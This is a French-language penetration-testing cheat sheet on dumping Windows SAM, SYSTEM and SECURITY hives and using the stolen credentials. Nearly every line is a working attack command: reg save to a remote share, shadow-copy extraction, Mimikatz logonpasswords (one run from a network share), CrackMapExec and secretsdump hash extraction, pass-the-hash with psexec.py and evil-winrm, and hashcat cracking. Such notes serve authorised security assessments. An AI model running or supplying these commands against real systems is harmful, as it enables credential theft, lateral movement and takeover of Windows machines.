Dump de la SAM
Localement
Récupération de la SAM
reg save hklm\sam sam.save
reg save hklm\system system.save
reg save hklm\security security.save
SET TARGET=172.16.5.225
reg save hklm\sam \\%TARGET%\share\sam.save
reg save hklm\system \\%TARGET%\share\system.save
reg save hklm\security \\%TARGET%\share\security.save
Création d'un cliché instantané si besoin
wmic shadowcopy call create Volume="C:\"
Liste des clichés disponibles
vssadmin.exe list shadows # Noter la ligne 'Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3'
mkdir C:\temp
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Windows\System32\config\SYSTEM C:\temp\SYSTEM
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Windows\System32\config\SAM C:\temp\SAM
Mimikatz
PS > .\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit > mimikatz_output.txt
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" >> c:\tmp\mimikatz_output.txt
mimikatz.exe "privilege::debug; sekurlsa::logonpasswords; exit" >> mimikatz_output.txt
**powershellz** \\172.16.5.225\share\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit
A distance
crackmapexec smb $TARGET_IP --local-auth -u $LOCAL_USER -p $LOCAL_PASS --sam
Extraction des Hashs
SAM
secretsdump.py local -sam sam.save -security security.save -system system.save LOCAL
Utilisation des Hash LM:NT
Accès distant
psexec.py Administrator@$TARGET_IP -hashes xxxxxxxxxxxxxxxxx:xxxxxxxxxxxxxxxxxxxxxxx
# ou
psexec.py Administrator@$TARGET_IP -hashes :xxxxxxxxxxxxxxxxxxxxxxx
# on peut également utiliser wmiexec.py et smbexec.py ou encore evil-winrm
evil-winrm -i $TARGET_IP -u Administrator -H "64f12cddaa88057e06a81b54e73b949b"
Cassage des hashs avec hashcat
cat hash.txt
64f12cddaa88057e06a81b54e73b949b
31d6cfe0d16ae931b73c59d7e0c089c0
...
sudo hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt